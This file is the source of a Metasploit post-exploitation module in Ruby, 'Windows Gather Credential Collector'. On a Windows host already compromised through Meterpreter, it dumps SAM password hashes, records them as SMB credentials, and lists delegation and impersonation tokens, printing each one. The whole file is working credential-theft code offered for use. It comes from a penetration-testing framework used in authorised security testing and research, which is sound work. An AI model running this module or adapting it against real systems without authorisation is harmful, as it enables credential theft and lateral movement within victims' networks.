GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/credential_collector.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report

  # Declares the module metadata (name, description, author, platform,
  # supported session type) and the two Meterpreter commands the module
  # depends on: incognito_list_tokens and priv_passwd_get_sam_hashes.
  def initialize(info = {})
    module_info = {
      'Name' => 'Windows Gather Credential Collector',
      'Description' => %q{ This module harvests credentials found on the host and stores them in the database.},
      'License' => MSF_LICENSE,
      'Author' => [ 'tebo[at]attackresearch.com'],
      'Platform' => [ 'win' ],
      'SessionTypes' => [ 'meterpreter'],
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            incognito_list_tokens
            priv_passwd_get_sam_hashes
          ]
        }
      }
    }
    super(update_info(info, module_info))
  end

  # Entry point for the `run` command.
  #
  # Reads the SAM hashes through the priv extension and records each one
  # as an NTLM credential with an UNTRIED SMB login, then lists delegation
  # and impersonation tokens through incognito and stores each as an
  # 'smb_token' note when a database is connected. Every extracted hash
  # and token is also echoed to the console.
  def run
    print_status("Running module against #{sysinfo['Computer']}")

    # Collection and printing happen regardless of database state; this
    # flag only gates the report_note calls for tokens further down.
    db_ok = session.framework.db.active ? true : false

    # The priv and incognito extensions must be loaded before their
    # commands can be used.
    session.core.use('priv') unless session.priv
    session.core.use('incognito') unless session.incognito

    # Hash retrieval fails in some process contexts; the error message
    # points at the architecture mismatch the original author observed.
    begin
      hashes = client.priv.sam_hashes
    rescue StandardError
      print_error('Error accessing hashes, did you migrate to a process that matched the target\'s architecture?')
      return
    end

    # Host address used for the service/credential records below.
    addr = session.session_host

    print_good 'Collecting hashes...'
    hashes.each { |sam_entry| record_hash(sam_entry, addr) }

    # Raising Completed ends the module run when no token list comes back
    # (presumably handled by the framework as a normal completion).
    tokens = session.incognito.incognito_list_tokens(0)
    raise Rex::Script::Completed unless tokens

    # incognito returns the tokens as newline-separated text, so the two
    # lists are concatenated and split into individual entries.
    print_good 'Collecting tokens...'
    token_lines = (tokens['delegation'] + tokens['impersonation']).split("\n")
    token_lines.each do |token|
      note = {
        host: addr,
        type: 'smb_token',
        data: token,
        update: :unique_data
      }
      print_line " #{note[:data]}"
      report_note(note) if db_ok
    end
  end

  private

  # Stores a single SAM entry as an :ntlm_hash credential bound to the
  # SMB service on +addr+, creates the matching UNTRIED login record, and
  # prints the extracted username and LM:NTLM pair.
  def record_hash(sam_entry, addr)
    service_data = {
      address: addr,
      port: 445,
      service_name: 'smb',
      protocol: 'tcp'
    }

    # LM and NT hashes are joined into the single colon-separated value
    # expected for the :ntlm_hash private type.
    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      private_type: :ntlm_hash,
      private_data: sam_entry.lanman + ':' + sam_entry.ntlm,
      username: sam_entry.user_name,
      workspace_id: myworkspace_id
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    # Options for the Metasploit::Credential::Login object.
    login_data = {
      core: credential_core,
      status: Metasploit::Model::Login::Status::UNTRIED,
      workspace_id: myworkspace_id
    }.merge(service_data)
    create_credential_login(login_data)

    print_line " Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}"
  end
end